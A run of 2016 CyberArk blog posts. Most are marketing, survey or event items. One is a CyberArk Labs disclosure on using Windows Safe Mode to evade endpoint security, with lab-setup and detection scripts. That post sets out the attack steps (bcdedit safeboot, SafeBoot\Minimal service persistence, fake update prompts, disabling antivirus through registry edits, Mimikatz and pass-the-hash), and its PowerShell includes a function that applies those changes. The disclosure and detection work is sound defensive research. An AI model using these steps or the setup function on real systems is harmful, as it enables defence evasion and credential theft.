The customer is the developer of an on-line system with millions of simultaneous, interactive users. Their cloud restart involves simultaneously re-authenticating and re-authorizing 10,000 secure hosts, each of which must re-fetch all the “secrets” (e.g. API keys, SSH keys, passwords, etc.) that it needs – about 150 secrets per host, or 1.5 million secrets in all. The requests are all issued at the same time by their configuration management system (Salt), and the credentials are used by those hosts to connect to the services and data sources across their infrastructure.

A distributed approach to scaling secrets management

Traditionally, secrets are kept and accessed via a centralized vault. In a situation like the one our customer faces, this can become a scalability bottleneck or a single point of failure.

Conjur takes an alternative approach, and runs as a tree of distributed, replicating servers. A Conjur “master” is updated with new identities, roles, permissions and data, which it replicates in real time to one or more “followers.” Each Conjur follower provides read-only API access to services, such as permission checks, distributing public keys, and granting access to secrets. Each follower also continuously generates audit records of system activity, which it transfers back up to the master. Followers are deployed as widely as the overall infrastructure: across multiple data centers, cloud providers, and cloud regions. This improves reliability and network latency by co-locating followers with client machines.

Because each follower has a complete copy of the data, followers can be used to very efficiently “scale out” the overall capacity. Load balancers can be deployed in front of the followers for efficient routing and health checks.

Customer benchmarks

Our customer ran benchmarks of their restart scenario. The results of the benchmarks, running a cluster of 3 Conjur followers on bare-metal servers (24 cores each), were as follows:

  • They achieved 218 authentication requests and 218 simultaneous batch secret fetches (150 secrets per batch) per Conjur follower; that’s 32,700 secrets served at once per follower.
  • Average response latency is about 5 seconds, so the auth+fetch cycle can be repeated every 5 seconds, serving up 392,000 secrets per minute per Conjur follower.
  • During the benchmark, access permissions for each secret request were validated and an audit trail kept.
  • Since Conjur is horizontally scalable, they plan to simply add 7 more followers in production. 10 Conjur followers will provide fault tolerance, and a total capacity of about 320,000 secrets every 5 seconds, which comes to ~4 million requests per minute.
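To make the master/follower design and the benchmark arithmetic above concrete, here is an added model (not Conjur's code): a master that owns secrets, roles and permissions and replicates its full state to read-only followers; followers that check a role's permission before returning each secret, audit every attempt (granted or denied) and ship those audit records back to the master; and a capacity function that reproduces the per-follower and 10-follower numbers from the benchmark. Role names, secret ids and values are constructed.

```python
"""Model of a master/follower secrets service plus the benchmark capacity model."""
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditRecord:
    follower: str
    role: str
    secret_id: str
    allowed: bool


class Master:
    """Write side: the only node that accepts changes; collects audit records."""

    def __init__(self):
        self.secrets = {}       # secret_id -> value
        self.permissions = {}   # secret_id -> set of roles allowed to read it
        self.followers = []
        self.audit_log = []     # records transferred up from followers

    def set_secret(self, secret_id, value, readers):
        self.secrets[secret_id] = value
        self.permissions[secret_id] = set(readers)
        self.replicate()

    def add_follower(self, follower):
        self.followers.append(follower)
        self.replicate()

    def replicate(self):
        # Full-state replication: every follower holds a complete copy, so any
        # follower can answer any read and a load balancer can route freely.
        for f in self.followers:
            f.apply(dict(self.secrets),
                    {k: set(v) for k, v in self.permissions.items()})

    def receive_audit(self, records):
        self.audit_log.extend(records)


class Follower:
    """Read-only replica, meant to be co-located with its clients."""

    def __init__(self, name, master):
        self.name, self.master = name, master
        self.secrets, self.permissions = {}, {}
        self._pending_audit = []
        master.add_follower(self)

    def apply(self, secrets, permissions):
        self.secrets, self.permissions = secrets, permissions

    def fetch_batch(self, role, secret_ids):
        """Return {secret_id: value} for the ids the role may read.
        Ids the role may not read, or that do not exist, are omitted; every
        attempt produces an audit record regardless of outcome."""
        out = {}
        for sid in secret_ids:
            allowed = role in self.permissions.get(sid, set())
            self._pending_audit.append(AuditRecord(self.name, role, sid, allowed))
            if allowed:
                out[sid] = self.secrets[sid]
        return out

    def flush_audit(self):
        """Transfer buffered audit records up to the master; return the count."""
        n = len(self._pending_audit)
        self.master.receive_audit(self._pending_audit)
        self._pending_audit = []
        return n


def capacity_per_minute(followers, concurrent_batches, secrets_per_batch, cycle_seconds):
    """Secrets served per minute when each follower completes
    `concurrent_batches` batch fetches every `cycle_seconds` seconds."""
    per_cycle = followers * concurrent_batches * secrets_per_batch
    return round(per_cycle * 60 / cycle_seconds)


def demo():
    """Two followers, two secrets, one batch fetch by a role with partial rights."""
    master = Master()
    us_east = Follower("us-east", master)
    eu_west = Follower("eu-west", master)
    master.set_secret("db/password", "s3cr3t", readers={"web"})          # constructed
    master.set_secret("api/key", "abc123", readers={"web", "batch"})     # constructed
    got = eu_west.fetch_batch("batch", ["db/password", "api/key", "missing"])
    eu_west.flush_audit()
    return got, [(r.secret_id, r.allowed) for r in master.audit_log], us_east.secrets
```

With the benchmark figures (218 batches of 150 secrets every 5 seconds) the function yields 392,400 per follower per minute and 3,924,000 for ten followers, the "~4 million" in the post.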

On top of database, app logic, and networking, secrets management is one more scalability concern to tackle in the cloud. It’s a hard challenge, but highly rewarding when done right.


]]>
Your Security Systems Need to be Secure https://www.cyberark.com/blog/security-systems-need-secure/ Mon, 26 Sep 2016 21:33:58 +0000 https://www.cyberark.com/blog//

According to a variety of industry reports, cyber security spending is measured in billions of dollars, and it’s projected to grow – driven by a number of market factors including cloud, mobile, IoT and other “elements of digital business.”

But as organizations move quickly to shore up their security systems, motivated attackers continue to innovate and evolve their tactics just as rapidly. From sophisticated phishing attacks, software flaws and reverse-engineering, to protocol analysis, misuse of cryptography, side-channel attacks and even attacks on physical security measures, attackers often have little trouble getting into an organization’s network. Remember – attackers are patient – always looking for a crack to enter enterprise networks.

This is one reason why layered security is critical – ideally including proactive controls such as encryption and detection systems to identify malicious behavior. Yet security systems can be largely ineffective without privileged account security in place as a safeguard.

Think of it this way: privileged accounts are embedded within every piece of security, database and network technology – used for installation and management. As such, they represent a gateway into your organization’s most valuable assets. If you deploy a million dollars’ worth of next-gen firewalls but don’t secure their privileged accounts, an attacker can obtain those credentials and go right through your firewall. Attackers are experts in spotting “cracks,” including small vulnerabilities that only exist for a few hours. Even the smallest “crack” of one stolen credential can be enough to make your million-dollar firewall investment nearly worthless—or worse, take down your entire organization.

Today’s reality is that the IT infrastructure is not fully protected unless privileged accounts and their credentials (accessed by both humans AND applications) are secured.

To maintain the credibility and efficacy of your security solutions, put privileged account security in place before you deploy any other security controls or detection solutions. For other reasons to prioritize privileged account security today, download our new At-a-Glance Guide.


]]>
Five Reasons Why It’s Time to Put Privilege First https://www.cyberark.com/blog/five-reasons-time-put-privilege-first/ Fri, 23 Sep 2016 20:30:53 +0000 https://www.cyberark.com/blog//

For more than a decade, CyberArk has focused on helping companies to protect high value assets inside the network. Over the years, privileged account security has evolved from compliance-driven projects to thoughtful strategic programs adopted enterprise wide.

Along the way, we have innovated and enhanced our offering to stay ahead of ever-changing advanced threats, but our focus remains on helping our customers to proactively protect privileged accounts. Today our platform delivers a new layer of security inside the network – designed to help organizations build and maintain trust in their IT systems and protect what matters. This is not only our mission, it’s our passion. Working closely with customers and educating the market about best practices is not only important, but essential for the entire business community. Best practices are not static – they advance as new insights are available. We listen, observe, collaborate and advise as threats emerge and evolve.

CyberArk works with security teams at companies in virtually every industry, and there is a growing recognition that privileged account security must be a top priority. Cyber attack headlines extend well beyond hospitals, government and financial institutions. All organizations have valuable assets – data about employees, customers, IP, financial information – and all organizations have privileged accounts that need to be secured in order for those assets to be protected.

Credentials—and, in particular, privileged credentials—give attackers the permissions necessary to access servers and steal data or go after the domain controllers and take control of the IT environment. They are the gateway to an organization’s most valuable assets and are the common denominator in the cyber attack life cycle. Securing privileged accounts and credentials must be at the top of the enterprise security agenda. In fact, it’s time to put privilege first.

With this in mind, we’ve highlighted five reasons to make privileged account security your first priority, and each is detailed in our new guide, which I encourage you to read.

5 top reasons to prioritize privileged account security:

  1. Privilege is the road most traveled.
  2. Privileged accounts represent the express lane to your domain controllers.
  3. Your security systems need to be secure.
  4. A single solution protects against insider threats and external attackers.
  5. Securing privileged accounts is the first action following an attack.

Prioritizing privilege will put you on the fast-track to reducing your organization’s risk profile with measurable return on your investment.

]]>
Just Released: CyberArk Global Advanced Threat Landscape Survey 2016 https://www.cyberark.com/blog/just-released-cyberark-global-advanced-threat-landscape-survey-2016/ Wed, 21 Sep 2016 22:07:29 +0000 https://www.cyberark.com/blog//

Today we unveiled findings from our 10th annual Global Advanced Threat Landscape Survey. This year’s report, themed “Cyber Security: Past, Present & Future,” examines whether or not global enterprises have learned and applied lessons from high-profile cyber attacks, and explores factors that influence security priorities and business decision-making.

While the vast majority of respondents (82 percent) believe the IT security industry is making progress against cyber attacks, those gains are undercut by egregious security practices in critical areas such as privileged account security, third-party vendor access and cloud. With that theme in mind, our take on some of the key findings are below. We encourage you to read the full, free report for your own assessment of the findings.

Bad Security Habits Persist, Despite Rising Awareness. Seventy-nine percent of respondents state their organization has learned lessons from major cyber attacks. Yet many fail to enforce best practices or adequately prioritize security initiatives in the right areas to effectively protect against advanced threats—underscoring a wide gap between “awareness” and “preparedness.” For example, more than half of the respondents state they have evolved or changed processes for managing privileged accounts, yet 40 percent of organizations still store privileged and administrative passwords in a Word document or spreadsheet and 28 percent use a shared server or USB stick.

The Risks of Overconfidence. Today, three out of four IT decision makers believe they can prevent attackers from breaking into their internal network—up from 44 percent in 2015. However, this [over]confidence is counter to the number of increasingly aggressive and damaging attacks reported. In fact, 46 percent of respondents believe their organization has been the victim of a ransomware attack in the last two years.

Future Risks and Prioritization Challenges. As cyber attacks continue on trusted institutions such as government, utilities and financial systems, when asked about emerging risks, respondents note they are most concerned with distributed denial-of-service (DDoS) attacks, phishing, ransomware, privileged account exploitation and perimeter breaches.

With threats against critical infrastructure, such as the much-publicized power outage in the Ukraine, no longer science fiction, respondents share their opinion on which scenarios present the most immediate and potentially catastrophic cyber security threat in general. The majority (58 percent) feel an attack on financial systems, including disruption of global stock markets, is the most threatening.

The findings of this year’s Global Advanced Threat Landscape Survey of 750 global IT & IT security decision makers demonstrate that cyber security awareness doesn’t always equate to being secure. Too often, organizations undermine their own efforts by failing to enforce well-known security best practices.

The majority of today’s breaches are a result of poor security hygiene. Organizations can’t lose sight of the broader security picture while trying to secure against the threat du jour. This means consistently executing on the fundamentals, from keeping security patches and software versions up-to-date, to implementing and enforcing least privilege access policies and using strong authentication as needed, and listening to auditors and consultants.

To learn more, download the Global Advanced Threat Landscape Survey 2016 at https://www.cyberark.com/resource/2016-global-advanced-threat-landscape-survey/.

]]>
CyberArk Labs: From Safe Mode to Domain Compromise https://www.cyberark.com/blog/cyberark-labs-from-safe-mode-to-domain-compromise/ Thu, 15 Sep 2016 19:11:38 +0000 https://www.cyberark.com/blog//

Overview

CyberArk Labs recently identified what it believes to be a significant risk related to Windows Safe Mode, which is built into all Windows Operating Systems (OS) on both PCs and servers. Once attackers break through the perimeter and gain local administrator privileges on an infected Windows-based machine, they can remotely activate Safe Mode to bypass and manipulate endpoint security measures. In Safe Mode, the attackers are able to freely run tools to harvest credentials and laterally move to connected systems – all while remaining undetected. This exploit can also work in Windows 10, despite the presence of Microsoft’s Virtual Secure Module (VSM).

By exploiting these weaknesses, attackers can turn infected endpoints into launching points for pass-the-hash attacks, which can provide attackers with access to more machines on which they can re-use these same attack techniques to ultimately compromise the entire Windows environment.

Introduction

Safe Mode is a long-standing, basic function of the Windows OS that was designed to provide a lean environment in which users can examine and resolve issues that cannot be resolved in Normal Mode. Safe Mode was first released in 1995 when “security” and “cyber” were still terms of science fiction. Back then, vendors were focused on system stability, efficiency and business operations – meaning security was usually neglected. Yet, as the Internet has become ubiquitous, such technologies have become tools of opportunity for cyber attackers.

Because Safe Mode was purposely designed to be lean, it restricts most third-party software, including security tools, from running. As a result, cyber attackers on compromised machines can remotely reboot those machines into Safe Mode to disable and evade endpoint defenses and subsequently launch their attacks. Given the number of Windows systems in use, this risk impacts billions of PCs and servers globally.

This blog will outline the privileged attack pathway that starts with Safe Mode, address how Safe Mode can be used to manipulate endpoint security measures, and suggest steps your organization should take right now to mitigate this risk.

Description of Risk

It’s fairly easy for attackers to break through the perimeter and gain access to at least one machine on a corporate network. In fact, in a recent report by FireEye, 84 percent of organizations surveyed admitted to falling victim to at least one spear-phishing attack in 2015 (1). Once the attacker has access to a machine, the attacker will attempt to gain local administrator rights either by leveraging the user’s existing privileges or by using an exploit to elevate to these privileges.

Once attackers have remote, local administrator access to infected machines, they need to evade a variety of endpoint security measures such as anti-virus and endpoint threat detection tools. Next, to maximize their success, attackers typically scour endpoints looking for credentials that can be reused to laterally move throughout the network. With this in mind, several tools, including Microsoft’s recently released Virtual Secure Module (VSM), have been created to operate at the endpoint level to limit the use of attack tools and protect credentials from pass-the-hash attacks. These tools can be highly effective, but the catch is, they are typically designed to operate only in Normal Mode.

Enter, Safe Mode. Safe Mode, by design, does not boot any software or drivers that are not critical to the operation of Windows. As a result, by remotely forcing a reboot in Safe Mode, attackers inside a compromised system are able to operate freely, as most endpoint defenses are not enabled. And because VSM is only enabled in Normal Mode, attackers can also capture credential hashes needed to laterally move through the environment – despite Microsoft’s claims that pass-the-hash risks have been mitigated (2).

Exploiting Safe Mode to Escalate an Attack

This example explains how Safe Mode can be exploited to allow an attacker to capture user credentials and execute pass-the-hash attacks to achieve lateral movement. This pattern of credential capture and lateral movement can be reused by an attacker multiple times until an eventual domain compromise is achieved.

To successfully exploit this weakness in Safe Mode, attackers must complete three steps:

  1. Change system settings to move the OS into Safe Mode during the next reboot
  2. Configure attack tools to load in Safe Mode
  3. Force the reboot of the machine to begin the exploit

This process is actually much easier than it sounds, and it can typically be done without the user noticing that anything has gone wrong. The steps below show just how simple this entire process can be.

Step 1: Remotely configure a machine to boot in Safe Mode

To remotely force a Windows-based machine into Safe Mode during the next reboot, attackers can use BCDEdit to configure the system to boot in Minimal Safe Mode. Once this change is made, the machine will – by default – boot in Minimal Safe Mode, which is the default Safe Mode boot option that runs only the minimal drivers and services needed to start Windows and prevents connections to the Internet and network.

Step 2: Configure attack tools to load in Safe Mode

Remember that, by design, Safe Mode loads only a minimal set of drivers and tools. To gain a presence in Safe Mode, the attacker must somehow enable his or her attack tools to run in this lean state. This can be done in a few ways, two of which include:

  • Malicious Service. Attackers can create a malicious service that is configured to load in Safe Mode. The service can be included in the attacker’s initial payload.
  • Malicious COM Object. Attackers can register a malicious COM object that is loaded by explorer.exe. This enables the attacker’s code to run each time explorer.exe needs to parse icons. (Yes, surprisingly this works in Safe Mode, as well.)

With these tools in place, the attacker’s malicious code will automatically run during the next reboot.

Since most endpoint security solutions are not effective in Minimal Safe Mode, these attack tools can easily evade endpoint security measures. In this state, the attacker is able to freely use his or her tools to steal credentials from LSASS.exe and then reuse those credentials to continue the attack path of lateral movement and privilege escalation.
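Steps 1 and 2 each leave an artifact a defender can audit: the boot configuration of the current OS entry carries a `safeboot` element when the next boot has been redirected to Safe Mode, and a service can only start in Minimal Safe Mode if it is registered under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal. The added triage script below (not CyberArk Labs' code) parses `bcdedit /enum {current}` output and a snapshot of that registry key, compares the service entries against a baseline captured from a clean build, and additionally flags services whose binary lives outside the Windows directory. The bcdedit text, the registry snapshot, the baseline and every service name and path are constructed samples.

```python
"""Triage checks for Safe Mode redirection and Safe Mode service persistence."""
import re

# Constructed sample of `bcdedit /enum {current}` output with safeboot set.
BCD_OUTPUT_SAFEBOOT = r"""
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \WINDOWS\system32\winload.efi
description             Windows 10
locale                  en-US
inherit                 {bootloadersettings}
safeboot                Minimal
osdevice                partition=C:
systemroot              \WINDOWS
"""
# The same entry without the safeboot element (what a normal machine shows).
BCD_OUTPUT_NORMAL = re.sub(r"^safeboot.*\n", "", BCD_OUTPUT_SAFEBOOT, flags=re.MULTILINE)

# SafeBoot\Minimal subkeys as a collection script would gather them:
# subkey name -> (default value, ImagePath of the service if it is a service).
# Constructed sample: three entries that look like Windows defaults plus one
# hypothetical attacker-added service with a made-up name and path.
SAFEBOOT_MINIMAL_SAMPLE = {
    "AppInfo": ("Service", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    "EventLog": ("Service", r"%SystemRoot%\System32\svchost.exe -k LocalServiceNetworkRestricted"),
    "Base": ("Driver Group", None),
    "UpdateHelperSvc": ("Service", r"C:\Users\Public\upd.exe"),   # constructed suspicious entry
}

# Baseline of service names captured from a clean build of the same image (constructed).
BASELINE_MINIMAL = {"AppInfo", "EventLog", "Base"}

SYSTEM_DIRS = ("c:\\windows\\",)


def bcd_safeboot_setting(bcd_text):
    """Return the value of the `safeboot` element in the listed entry, or None."""
    m = re.search(r"^safeboot\s+(\S+)", bcd_text, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def _image_outside_system_dirs(image_path):
    """Heuristic: True when the service binary is not under the Windows directory.
    Expands %SystemRoot% and ignores quoting; it is a prioritisation aid, not proof."""
    p = image_path.strip().lstrip('"').lower().replace("%systemroot%", "c:\\windows")
    return not p.startswith(SYSTEM_DIRS)


def suspicious_safeboot_services(entries, baseline):
    """Flag Service entries missing from the baseline and/or with an image path
    outside the Windows directory. Returns [(name, image_path, [reasons])]."""
    findings = []
    for name, (kind, image) in entries.items():
        if kind != "Service":
            continue  # driver groups and device classes are handled by baselining elsewhere
        reasons = []
        if name not in baseline:
            reasons.append("not in baseline")
        if image and _image_outside_system_dirs(image):
            reasons.append("binary outside Windows directory")
        if reasons:
            findings.append((name, image, reasons))
    return findings


def triage(bcd_text, entries, baseline):
    """Combine both checks into a list of human-readable findings (empty = clean)."""
    findings = []
    mode = bcd_safeboot_setting(bcd_text)
    if mode:
        findings.append(f"BCD {{current}} has safeboot={mode}: next reboot enters Safe Mode")
    for name, image, reasons in suspicious_safeboot_services(entries, baseline):
        findings.append(f"SafeBoot\\Minimal\\{name} ({image}): {', '.join(reasons)}")
    return findings


if __name__ == "__main__":
    for line in triage(BCD_OUTPUT_SAFEBOOT, SAFEBOOT_MINIMAL_SAMPLE, BASELINE_MINIMAL):
        print(line)
```

A safeboot element present on a machine nobody has scheduled for Safe Mode, or a SafeBoot\Minimal service that is absent from the clean-build baseline, is a finding to investigate before the reboot the attacker is waiting for.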

Step 3: Restart the machine to execute the next phase of the attack

This can easily be done in a variety of ways, including directly from the command line in Normal Mode.

But wait! How does the attacker do this without the victim noticing? Sure, the attacker can arbitrarily force a restart, but that will likely look suspicious to the user and prompt a phone call to the IT team. Instead, to stay under the radar, the attacker can either wait for the next restart or show the victim an “update” window saying that the PC must be rebooted. This “update” window can be designed to look like a legitimate Windows pop-up.

Next, depending on the attacker’s goal, there are a few techniques an attacker can use to continue to stay hidden from the victim. Let’s look at the techniques based on the attacker’s goal:

  • Credential Theft. If the attacker's goal is to steal credentials for future use, the attacker actually wants the user to log on to the system so that the credentials can be captured as they are entered. In this case the attacker will likely use the COM object technique to run code that changes the background, look and feel of Safe Mode so that it appears the user is still in Normal Mode. As soon as the user has entered his or her credentials, a second “update” window can prompt the user to reboot yet again, moving the machine back into the real Normal Mode. As above, this second reboot prompt can mimic a legitimate Windows prompt so that the user notices nothing suspicious.
  • Lateral Movement. If the attacker's goal is to perform a pass-the-hash attack with previously compromised credentials, the user does not need to log in at all. In this case the attacker is better off creating a service. At reboot, the service can automatically run code that executes the pass-the-hash attack and then immediately reboots the machine back into Normal Mode. To the user, the back-to-back restarts look like a single reboot, which further reduces the chance that anyone notices something went wrong. Keep in mind that Minimal Safe Mode brings up no networking: Safe Mode is where hashes are harvested without interference, while the network authentication step has to happen from Network Safe Mode or once the machine is back in Normal Mode. Based on tests conducted by CyberArk Labs, we found this technique highly effective at stealthily enabling lateral movement.

What about the Event Log? Someone can definitely see that a PC booted into Safe Mode. That is correct, but at this point I'd encourage you to read research by my colleague Roi Cohen, “Can Incident Response and Audit Teams Always Trust Windows Security Event Logs?”

Exploiting Safe Mode to Manipulate Security Measures

The next example shows how attackers can not only avoid endpoint security defenses in Safe Mode but also manipulate those solutions from within Safe Mode. This example was tested against McAfee LiveSafe, Avira Free Antivirus, Trend Micro Maximum Security 10 and Windows Defender.

All of these solutions run in Normal Mode, and some also run in Network Safe Mode, the Safe Mode boot option that loads the minimal drivers and services needed to start Windows plus those needed to connect to the Internet and network. None of them, however, runs in Minimal Safe Mode. As a result, the registry keys these products depend on, which they protect only while they are running, cannot be modified in Normal Mode or Network Safe Mode, but they can be modified freely in Minimal Safe Mode.

Once an attacker has booted a machine into Minimal Safe Mode, the attacker can access registry keys and alter configurations to disable or manipulate endpoint security solutions. Once that’s complete, an attacker can reboot the machine back into Normal Mode and freely proceed with the attack without the risk of being blocked by an endpoint security solution.

When testing this in our lab, we attempted to use Mimikatz in Normal Mode to steal credentials from memory. When endpoint security solutions were properly configured, Mimikatz was removed each time we attempted to use it – including when we attempted to copy it to the disk. After we modified the registry keys in Minimal Safe Mode, we were able to seamlessly run Mimikatz, write the tool to the disk, and successfully capture credentials without setting off any alarms.

Mitigation

Though this risk is built into every Windows OS, there are a few proactive steps organizations can take to mitigate it. Recommendations include the following:

  • Enforce the principle of least privilege. Configuring a machine to boot into Safe Mode from Normal Mode requires local administrator privileges. By removing local administrator rights from standard users, organizations reduce their exposure to this type of attack.
  • Rotate privileged account credentials. A pass-the-hash attack only succeeds while the stolen hash is still valid. By proactively rotating privileged account credentials, organizations frequently and automatically invalidate the password hashes that may exist on machines throughout the environment. Attackers can still capture hashes from compromised machines, but once rotation has run those hashes are useless.
  • Employ security tools that operate in Safe Mode. Security tools that only function in Normal Mode leave organizations exposed to this type of attack. When evaluating endpoint security tools, confirm that the solution you select also runs, and protects its own configuration, in Minimal Safe Mode and not just in Network Safe Mode.
  • Monitor the use of Safe Mode. This can be done both proactively and after the fact: alert when a machine boots into Safe Mode, and search the Windows Event Log for such events. Note, however, that recent research indicates the Windows Event Log cannot be entirely trusted, so treat it as one signal rather than the only one.
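As an added example (written for this edit, not code from CyberArk Labs), the PowerShell below ties the three attacker steps described earlier to the last two recommendations above. Invoke-SafeModeLabSetup reproduces, on a lab VM you own, the changes from steps 1 and 2: the BCD safeboot flag and a service registered to start in Minimal Safe Mode through the SafeBoot\Minimal registry key, which is the mechanism that lets a service survive the lean boot. Test-SafeModeTampering is the audit a defender would schedule on endpoints: it looks for those same artefacts, checks whether the machine is currently in Safe Mode, and checks whether the endpoint security service is registered to run there at all. The service name LabSafeModeSvc, its binary path, the WinDefend service name and the baseline list of SafeBoot\Minimal entries are assumptions; the baseline must be captured from a known-good machine of the same Windows build.

```powershell
#Requires -RunAsAdministrator
# Added example, not CyberArk Labs' code. Two halves, meant for a lab VM you own:
#   Invoke-SafeModeLabSetup  reproduces the attacker changes from steps 1-2 of the post (BCD
#                            safeboot flag plus a service registered to start in Minimal Safe Mode).
#   Test-SafeModeTampering   is the audit a defender can schedule on endpoints: it reports those
#                            same artefacts, whether the machine is in Safe Mode right now, and
#                            whether the endpoint security service is registered for Safe Mode.
# Assumptions not taken from the post: the service name 'LabSafeModeSvc', its binary path, the
# security service name 'WinDefend', and the baseline list of SafeBoot\Minimal entries.

$SafeBootMinimal = 'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal'

function Invoke-SafeModeLabSetup {
    param(
        [string]$ServiceName = 'LabSafeModeSvc',        # assumption
        [string]$BinaryPath  = 'C:\Lab\labsvc.exe'      # assumption: any service binary you control
    )
    # Step 1: flag the current boot entry so the next reboot starts in Minimal Safe Mode.
    # '{current}' must be quoted in PowerShell, otherwise the braces parse as a script block.
    bcdedit /set '{current}' safeboot minimal | Out-Null

    # Step 2: an ordinary service is not started in Safe Mode. Windows only starts services
    # (or drivers) that have a subkey under SafeBoot\Minimal named after the service, whose
    # default value is the string "Service" (or "Driver"). That subkey is the attacker's foothold.
    # (Network Safe Mode uses the sibling key SafeBoot\Network.)
    New-Service -Name $ServiceName -BinaryPathName $BinaryPath -StartupType Automatic | Out-Null
    $key = Join-Path $SafeBootMinimal $ServiceName
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name '(default)' -Value 'Service'

    # Step 3 is the reboot (Restart-Computer -Force). It is left to the operator so that the
    # audit below can be run and compared before and after.
}

function Undo-SafeModeLabSetup {
    param([string]$ServiceName = 'LabSafeModeSvc')
    bcdedit /deletevalue '{current}' safeboot | Out-Null
    Remove-Item -Path (Join-Path $SafeBootMinimal $ServiceName) -Recurse -ErrorAction SilentlyContinue
    sc.exe delete $ServiceName | Out-Null
}

function Test-SafeModeTampering {
    param(
        [string[]]$BaselineEntries,                     # assumed: captured from a clean reference host
        [string[]]$SecurityServices = @('WinDefend')    # assumed: your endpoint security service name(s)
    )
    $findings = @()

    # 1. Is a safeboot flag queued for the next reboot? bcdedit prints a line such as
    #    "safeboot                Minimal" when it is.
    foreach ($line in (bcdedit /enum '{current}' 2>$null)) {
        if ($line -match '^\s*safeboot\s+(\S+)') {
            $findings += "BCD safeboot flag set on {current}: $($Matches[1])"
            break
        }
    }

    # 2. Which services/drivers are registered to start in Minimal Safe Mode that the baseline
    #    does not know about? A new entry here is the artefact of step 2.
    $entries = Get-ChildItem -Path $SafeBootMinimal | Select-Object -ExpandProperty PSChildName
    foreach ($e in $entries) {
        if ($BaselineEntries -notcontains $e) {
            $kind = (Get-ItemProperty -Path (Join-Path $SafeBootMinimal $e) -ErrorAction SilentlyContinue).'(default)'
            $findings += "SafeBoot\Minimal entry not in baseline: $e ($kind)"
        }
    }

    # 3. Are we in Safe Mode right now? SAFEBOOT_OPTION is only set during a Safe Mode boot
    #    ('MINIMAL' or 'NETWORK'); Win32_ComputerSystem.BootupState reports 'Normal boot',
    #    'Fail-safe boot' or 'Fail-safe with network boot'.
    $state = (Get-CimInstance -ClassName Win32_ComputerSystem).BootupState
    if ($env:SAFEBOOT_OPTION -or $state -ne 'Normal boot') {
        $findings += "Machine is currently in Safe Mode (SAFEBOOT_OPTION=$($env:SAFEBOOT_OPTION), BootupState=$state)"
    }

    # 4. Can the endpoint security service start in Minimal Safe Mode at all? If it has no
    #    SafeBoot\Minimal entry, it is absent exactly when the attacker is active.
    foreach ($svc in $SecurityServices) {
        if ($entries -notcontains $svc) {
            $findings += "Security service '$svc' is not registered to run in Minimal Safe Mode"
        }
    }

    return $findings
}
```

Capture the baseline once on a clean reference host by listing the subkeys of SafeBoot\Minimal, then run Test-SafeModeTampering -BaselineEntries (Get-Content baseline.txt) from a scheduled task and forward any findings to your SIEM. Because the attacker needs only one registry write and one bcdedit call, a real-time EDR or Sysmon rule on writes under SafeBoot\Minimal and SafeBoot\Network and on bcdedit command lines containing "safeboot" complements this polling audit and catches the change before the reboot rather than after it.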

Disclosure Timeline

  • February 24, 2016: Initial discovery by CyberArk Labs
  • May 2, 2016: Risk reported to Microsoft Security Response Center
  • May 2, 2016: Microsoft responded that they did not consider the submission a valid vulnerability as it requires an attacker to have already compromised the machine.*
  • September 15, 2016: Public disclosure

*According to Microsoft’s “Ten Immutable Laws of Security


]]>
Supply Chain Risk Management Standards to be Developed as Part of NERC’s Critical Infrastructure Protection Security Mission https://www.cyberark.com/blog/supply-chain-risk-management-standards-developed-part-nercs-critical-infrastructure-protection-security-mission/ Tue, 13 Sep 2016 17:05:18 +0000 https://www.cyberark.com/blog//

On July 21, 2016, the Federal Energy Regulatory Commission (FERC) directed the North American Electric Reliability Corporation (NERC) to develop a new supply chain risk management standard that addresses risks to information systems and related bulk electric system assets. The standard will cover a variety of issues, including software integrity and authenticity, remote vendor access, vendor risk management and procurement controls.

In parallel, FERC also issued a Notice of Inquiry (NOI) to gather the public's input on the protection of the control centers used to monitor and control the bulk electric system in real time, with particular interest in remote vendor access and application whitelisting. In this NOI, FERC referred to the December 2015 attack on the Ukrainian electric grid as an example of the need to update the current Critical Infrastructure Protection (CIP) standards.

These initiatives share a common interest in securing the communications that connect the electric utilities' control centers to the outside world. This is an important step in mitigating future attacks on the Industrial Control Systems (ICS) that monitor and control the equipment responsible for generating and transmitting power in North America. Continuing to develop the CIP standards while welcoming the industry's expertise will help organizations reduce the ICS attack surface by better managing the security of remote vendors and the supply chain in general. To learn more about how CyberArk addresses the NERC CIP standards and requirements, read our white paper: Protecting the Grid: Addressing NERC CIP Requirements for Securing Privileged Accounts.

In June 2016, CyberArk introduced new cyber security capabilities for ICS to limit the progression of malware, better identify privileged account-related risks, and improve remote access security in industrial environments. We will share our perspective on the best practices organizations should follow to shore up security gaps in their supply chain and to secure access to sensitive assets. We plan to formally submit comments to the FERC on this NOI, and we encourage other industry experts to support the initiative.

]]>
Tune In To Our Webcast Series: On the Front Lines https://www.cyberark.com/blog/tune-webcast-series-front-lines/ Thu, 01 Sep 2016 19:39:09 +0000 https://www.cyberark.com/blog//

We recently kicked off a new webcast series, On the Front Lines. Led by our team of systems engineers, these webcasts take place on Tuesdays at 2:00 p.m. EDT and offer information on cyber security trends, technical details on security exploits involving privileged accounts and actionable insights on improving privileged access controls.

Over the past few weeks, we’ve examined the exploitation of privileged accounts in today’s most damaging advanced attacks; discussed how privilege management plays a critical role in preventing credential theft and lateral movement; explored an innovative new approach to combating ransomware; and outlined steps for jump-starting a privileged account security program.

Here’s a quick look at our upcoming sessions for September:

September 13: Detect & Respond to Attacks on Domain Controllers: An End-to-End Look at Kerberos Attacks

Attackers frequently target Domain Controllers to ultimately gain carte blanche access to an entire organization. Once an attacker has access to a domain administrator credential, they can generate Kerberos tickets to achieve unauthorized, undetected, and often, unfettered access to the enterprise environment. Led by Len Noe, this session will feature a live demonstration of a Golden Ticket attack as well as a discussion around Domain Controller security—including proactive protection, detection and response to attacks that target Domain Controllers. You can register for this webcast here.

September 20: Find Your Privileged Account Security Risks via a Discovery & Audit Exercise

Most organizations have 3-4 times more privileged accounts than employees, but where do these privileged accounts exist? Attackers can easily locate your high value users (Domain Admins) and high value assets (Domain Controllers)—can you? Do you understand how to secure them? Join this session with Kevin Ross to learn how CyberArk’s Discovery and Audit tool finds vulnerable privileged credentials, including passwords and SSH keys, and makes suggestions for securing your privileged account environment. You can register for this webcast here.

September 27: CyberArk and Multi-factor Authentication

